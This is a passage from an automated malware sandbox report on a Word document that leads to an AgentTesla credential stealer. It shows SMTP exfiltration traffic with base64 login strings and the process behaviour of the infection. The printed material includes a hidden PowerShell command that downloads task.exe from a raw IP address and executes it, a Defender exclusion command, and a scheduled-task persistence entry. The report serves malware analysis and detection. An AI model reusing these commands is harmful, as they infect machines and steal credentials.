                                                                                                                      250-AUTH=PLAIN LOGIN
                                                                                                                      250-ENHANCEDSTATUSCODES
                                                                                                                      250-8BITMIME
                                                                                                                      250 DSN
                                                                                                                      Nov 25, 2021 18:22:26.830857038 CET49170587192.168.2.22208.91.198.143AUTH login ZHViYWlAc2t5Y29tZXguY29t
                                                                                                                      Nov 25, 2021 18:22:26.983576059 CET58749170208.91.198.143192.168.2.22334 UGFzc3dvcmQ6
                                                                                                                      Nov 25, 2021 18:22:27.138392925 CET58749170208.91.198.143192.168.2.22235 2.7.0 Authentication successful
                                                                                                                      Nov 25, 2021 18:22:27.141244888 CET49170587192.168.2.22208.91.198.143MAIL FROM:<dubai@skycomex.com>
                                                                                                                      Nov 25, 2021 18:22:27.294445038 CET58749170208.91.198.143192.168.2.22250 2.1.0 Ok
                                                                                                                      Nov 25, 2021 18:22:27.324578047 CET49170587192.168.2.22208.91.198.143RCPT TO:<dubai@skycomex.com>
                                                                                                                      Nov 25, 2021 18:22:27.495106936 CET58749170208.91.198.143192.168.2.22250 2.1.5 Ok
                                                                                                                      Nov 25, 2021 18:22:27.495655060 CET49170587192.168.2.22208.91.198.143DATA
                                                                                                                      Nov 25, 2021 18:22:27.647941113 CET58749170208.91.198.143192.168.2.22354 End data with <CR><LF>.<CR><LF>
                                                                                                                      Nov 25, 2021 18:22:28.720513105 CET58749170208.91.198.143192.168.2.22250 2.0.0 Ok: queued as 64796782210
                                                                                                                      Nov 25, 2021 18:22:38.691118956 CET49170587192.168.2.22208.91.198.143QUIT
                                                                                                                      Nov 25, 2021 18:22:38.843374014 CET58749170208.91.198.143192.168.2.22221 2.0.0 Bye
                                                                                                                      Nov 25, 2021 18:22:39.279792070 CET58749171208.91.198.143192.168.2.22220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                                      Nov 25, 2021 18:22:39.280284882 CET49171587192.168.2.22208.91.198.143EHLO 841618
                                                                                                                      Nov 25, 2021 18:22:39.432149887 CET58749171208.91.198.143192.168.2.22250-us2.outbound.mailhostbox.com
                                                                                                                      250-PIPELINING
                                                                                                                      250-SIZE 41648128
                                                                                                                      250-VRFY
                                                                                                                      250-ETRN
                                                                                                                      250-STARTTLS
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-AUTH=PLAIN LOGIN
                                                                                                                      250-ENHANCEDSTATUSCODES
                                                                                                                      250-8BITMIME
                                                                                                                      250 DSN
                                                                                                                      Nov 25, 2021 18:22:39.432733059 CET49171587192.168.2.22208.91.198.143AUTH login ZHViYWlAc2t5Y29tZXguY29t
                                                                                                                      Nov 25, 2021 18:22:39.585161924 CET58749171208.91.198.143192.168.2.22334 UGFzc3dvcmQ6
                                                                                                                      Nov 25, 2021 18:22:39.739599943 CET58749171208.91.198.143192.168.2.22235 2.7.0 Authentication successful
                                                                                                                      Nov 25, 2021 18:22:39.740127087 CET49171587192.168.2.22208.91.198.143MAIL FROM:<dubai@skycomex.com>
                                                                                                                      Nov 25, 2021 18:22:39.892735004 CET58749171208.91.198.143192.168.2.22250 2.1.0 Ok
                                                                                                                      Nov 25, 2021 18:22:39.893397093 CET49171587192.168.2.22208.91.198.143RCPT TO:<dubai@skycomex.com>
                                                                                                                      Nov 25, 2021 18:22:40.063146114 CET58749171208.91.198.143192.168.2.22250 2.1.5 Ok
                                                                                                                      Nov 25, 2021 18:22:40.063385963 CET49171587192.168.2.22208.91.198.143DATA
                                                                                                                      Nov 25, 2021 18:22:40.215734005 CET58749171208.91.198.143192.168.2.22354 End data with <CR><LF>.<CR><LF>
                                                                                                                      Nov 25, 2021 18:22:41.810641050 CET58749171208.91.198.143192.168.2.22250 2.0.0 Ok: queued as EF3B278223D
                                                                                                                      Nov 25, 2021 18:23:07.356256962 CET58749172208.91.198.143192.168.2.22220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                                      Nov 25, 2021 18:23:07.391012907 CET49172587192.168.2.22208.91.198.143EHLO 841618
                                                                                                                      Nov 25, 2021 18:23:07.543054104 CET58749172208.91.198.143192.168.2.22250-us2.outbound.mailhostbox.com
                                                                                                                      250-PIPELINING
                                                                                                                      250-SIZE 41648128
                                                                                                                      250-VRFY
                                                                                                                      250-ETRN
                                                                                                                      250-STARTTLS
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-AUTH=PLAIN LOGIN
                                                                                                                      250-ENHANCEDSTATUSCODES
                                                                                                                      250-8BITMIME
                                                                                                                      250 DSN
                                                                                                                      Nov 25, 2021 18:23:07.543271065 CET49172587192.168.2.22208.91.198.143AUTH login ZHViYWlAc2t5Y29tZXguY29t
                                                                                                                      Nov 25, 2021 18:23:07.695821047 CET58749172208.91.198.143192.168.2.22334 UGFzc3dvcmQ6
                                                                                                                      Nov 25, 2021 18:23:07.850228071 CET58749172208.91.198.143192.168.2.22235 2.7.0 Authentication successful
                                                                                                                      Nov 25, 2021 18:23:07.850539923 CET49172587192.168.2.22208.91.198.143MAIL FROM:<dubai@skycomex.com>
                                                                                                                      Nov 25, 2021 18:23:07.996356010 CET58749172208.91.198.143192.168.2.22250 2.1.0 Ok
                                                                                                                      Nov 25, 2021 18:23:07.996689081 CET49172587192.168.2.22208.91.198.143RCPT TO:<dubai@skycomex.com>
                                                                                                                      Nov 25, 2021 18:23:08.149750948 CET58749172208.91.198.143192.168.2.22250 2.1.5 Ok
                                                                                                                      Nov 25, 2021 18:23:08.149959087 CET49172587192.168.2.22208.91.198.143DATA
                                                                                                                      Nov 25, 2021 18:23:08.295223951 CET58749172208.91.198.143192.168.2.22354 End data with <CR><LF>.<CR><LF>
                                                                                                                      Nov 25, 2021 18:23:09.657242060 CET49172587192.168.2.22208.91.198.143.
                                                                                                                      Nov 25, 2021 18:23:09.974106073 CET58749172208.91.198.143192.168.2.22250 2.0.0 Ok: queued as 142B2782310
                                                                                                                      Nov 25, 2021 18:23:15.925235987 CET49172587192.168.2.22208.91.198.143QUIT
                                                                                                                      Nov 25, 2021 18:23:16.070209980 CET58749172208.91.198.143192.168.2.22221 2.0.0 Bye
                                                                                                                      Nov 25, 2021 18:23:16.070552111 CET49171587192.168.2.22208.91.198.143QUIT
                                                                                                                      Nov 25, 2021 18:23:16.216047049 CET58749171208.91.198.143192.168.2.22221 2.0.0 Bye
                                                                                                                      Nov 25, 2021 18:23:16.747162104 CET58749173208.91.199.224192.168.2.22220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                                      Nov 25, 2021 18:23:16.747487068 CET49173587192.168.2.22208.91.199.224EHLO 841618
                                                                                                                      Nov 25, 2021 18:23:16.891685009 CET58749173208.91.199.224192.168.2.22250-us2.outbound.mailhostbox.com
                                                                                                                      250-PIPELINING
                                                                                                                      250-SIZE 41648128
                                                                                                                      250-VRFY
                                                                                                                      250-ETRN
                                                                                                                      250-STARTTLS
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-AUTH=PLAIN LOGIN
                                                                                                                      250-ENHANCEDSTATUSCODES
                                                                                                                      250-8BITMIME
                                                                                                                      250 DSN
                                                                                                                      Nov 25, 2021 18:23:16.891992092 CET49173587192.168.2.22208.91.199.224AUTH login ZHViYWlAc2t5Y29tZXguY29t
                                                                                                                      Nov 25, 2021 18:23:17.036999941 CET58749173208.91.199.224192.168.2.22334 UGFzc3dvcmQ6
                                                                                                                      Nov 25, 2021 18:23:17.183504105 CET58749173208.91.199.224192.168.2.22235 2.7.0 Authentication successful
                                                                                                                      Nov 25, 2021 18:23:17.183830023 CET49173587192.168.2.22208.91.199.224MAIL FROM:<dubai@skycomex.com>
                                                                                                                      Nov 25, 2021 18:23:17.329072952 CET58749173208.91.199.224192.168.2.22250 2.1.0 Ok
                                                                                                                      Nov 25, 2021 18:23:17.329498053 CET49173587192.168.2.22208.91.199.224RCPT TO:<dubai@skycomex.com>
                                                                                                                      Nov 25, 2021 18:23:17.486474991 CET58749173208.91.199.224192.168.2.22250 2.1.5 Ok
                                                                                                                      Nov 25, 2021 18:23:17.486887932 CET49173587192.168.2.22208.91.199.224DATA
                                                                                                                      Nov 25, 2021 18:23:17.631376982 CET58749173208.91.199.224192.168.2.22354 End data with <CR><LF>.<CR><LF>
                                                                                                                      Nov 25, 2021 18:23:19.153431892 CET58749173208.91.199.224192.168.2.22250 2.0.0 Ok: queued as 65A7C3A18B7
                                                                                                                      Nov 25, 2021 18:23:22.322994947 CET58749175208.91.198.143192.168.2.22220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                                      Nov 25, 2021 18:23:22.323681116 CET49175587192.168.2.22208.91.198.143EHLO 841618
                                                                                                                      Nov 25, 2021 18:23:22.471884966 CET58749175208.91.198.143192.168.2.22250-us2.outbound.mailhostbox.com
                                                                                                                      250-PIPELINING
                                                                                                                      250-SIZE 41648128
                                                                                                                      250-VRFY
                                                                                                                      250-ETRN
                                                                                                                      250-STARTTLS
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-AUTH=PLAIN LOGIN
                                                                                                                      250-ENHANCEDSTATUSCODES
                                                                                                                      250-8BITMIME
                                                                                                                      250 DSN
                                                                                                                      Nov 25, 2021 18:23:22.472337961 CET49175587192.168.2.22208.91.198.143AUTH login ZHViYWlAc2t5Y29tZXguY29t
                                                                                                                      Nov 25, 2021 18:23:22.621323109 CET58749175208.91.198.143192.168.2.22334 UGFzc3dvcmQ6
                                                                                                                      Nov 25, 2021 18:23:22.820713997 CET58749175208.91.198.143192.168.2.22235 2.7.0 Authentication successful
                                                                                                                      Nov 25, 2021 18:23:22.827204943 CET49175587192.168.2.22208.91.198.143MAIL FROM:<dubai@skycomex.com>
                                                                                                                      Nov 25, 2021 18:23:22.976063967 CET58749175208.91.198.143192.168.2.22250 2.1.0 Ok
                                                                                                                      Nov 25, 2021 18:23:22.983613014 CET49175587192.168.2.22208.91.198.143RCPT TO:<dubai@skycomex.com>
                                                                                                                      Nov 25, 2021 18:23:23.147027016 CET58749175208.91.198.143192.168.2.22250 2.1.5 Ok
                                                                                                                      Nov 25, 2021 18:23:23.151930094 CET49175587192.168.2.22208.91.198.143DATA
                                                                                                                      Nov 25, 2021 18:23:23.300436974 CET58749175208.91.198.143192.168.2.22354 End data with <CR><LF>.<CR><LF>
                                                                                                                      Nov 25, 2021 18:23:23.304953098 CET49175587192.168.2.22208.91.198.143.
                                                                                                                      Nov 25, 2021 18:23:23.551043034 CET58749175208.91.198.143192.168.2.22250 2.0.0 Ok: queued as 10FB978235B

                                                                                                                      Code Manipulations

                                                                                                                      Statistics

                                                                                                                      Behavior

                                                                                                                      Click to jump to process

                                                                                                                      System Behavior

                                                                                                                      General

                                                                                                                      Start time:18:21:13
                                                                                                                      Start date:25/11/2021
                                                                                                                      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                                                                                      Imagebase:0x13f050000
                                                                                                                      File size:1423704 bytes
                                                                                                                      MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high

                                                                                                                      General

                                                                                                                      Start time:18:21:20
                                                                                                                      Start date:25/11/2021
                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
                                                                                                                      Imagebase:0x13f870000
                                                                                                                      File size:473600 bytes
                                                                                                                      MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                      Yara matches:
                                                                                                                      • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000003.00000002.429522504.0000000000170000.00000004.00000020.sdmp, Author: Florian Roth
                                                                                                                      Reputation:high

                                                                                                                      General

                                                                                                                      Start time:18:21:22
                                                                                                                      Start date:25/11/2021
                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
                                                                                                                      Imagebase:0x13f870000
                                                                                                                      File size:473600 bytes
                                                                                                                      MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                      Yara matches:
                                                                                                                      • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000005.00000002.424289946.0000000000360000.00000004.00000020.sdmp, Author: Florian Roth
                                                                                                                      Reputation:high

                                                                                                                      General

                                                                                                                      Start time:18:21:22
                                                                                                                      Start date:25/11/2021
                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
                                                                                                                      Imagebase:0x13f870000
                                                                                                                      File size:473600 bytes
                                                                                                                      MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                      Reputation:high

                                                                                                                      General

                                                                                                                      Start time:18:21:28
                                                                                                                      Start date:25/11/2021
                                                                                                                      Path:C:\Users\user\AppData\Roaming\task.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\task.exe"
                                                                                                                      Imagebase:0xcf0000
                                                                                                                      File size:504832 bytes
                                                                                                                      MD5 hash:F65B0793251364C03D06E8E7134FC21B
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000009.00000002.448392775.000000000239B000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.448684554.00000000032AD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000002.448684554.00000000032AD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000009.00000002.448245282.00000000022AF000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                      Reputation:low

                                                                                                                      General

                                                                                                                      Start time:18:21:32
                                                                                                                      Start date:25/11/2021
                                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SzfukVRF.exe
                                                                                                                      Imagebase:0x220f0000
                                                                                                                      File size:452608 bytes
                                                                                                                      MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                      Reputation:high

                                                                                                                      General

                                                                                                                      Start time:18:21:33
                                                                                                                      Start date:25/11/2021
                                                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SzfukVRF" /XML "C:\Users\user\AppData\Local\Temp\tmpBA6A.tmp
                                                                                                                      Imagebase:0xe0000
                                                                                                                      File size:179712 bytes
                                                                                                                      MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high

                                                                                                                      General

                                                                                                                      Start time:18:21:35
                                                                                                                      Start date:25/11/2021
                                                                                                                      Path:C:\Users\user\AppData\Roaming\task.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\task.exe
                                                                                                                      Imagebase:0xcf0000
                                                                                                                      File size:504832 bytes
                                                                                                                      MD5 hash:F65B0793251364C03D06E8E7134FC21B
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.705737586.00000000023B1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.705737586.00000000023B1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000000.446276168.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000000.446276168.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000000.445141898.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000000.445141898.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000000.445754723.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000000.445754723.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000000.446674147.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000000.446674147.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.705023862.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000002.705023862.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.705804670.000000000240A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.705804670.000000000240A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                      Reputation:low

                                                                                                                      General

                                                                                                                      Start time:18:21:42
                                                                                                                      Start date:25/11/2021
                                                                                                                      Path:C:\Windows\System32\verclsid.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
                                                                                                                      Imagebase:0xffd50000
                                                                                                                      File size:11776 bytes
                                                                                                                      MD5 hash:3796AE13F680D9239210513EDA590E86
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:moderate

                                                                                                                      General

                                                                                                                      Start time:18:21:43
                                                                                                                      Start date:25/11/2021
                                                                                                                      Path:C:\Windows\System32\notepad.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
                                                                                                                      Imagebase:0xff970000
                                                                                                                      File size:193536 bytes
                                                                                                                      MD5 hash:B32189BDFF6E577A92BAA61AD49264E6
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:moderate

                                                                                                                      Disassembly

                                                                                                                      Code Analysis

                                                                                                                      Reset < >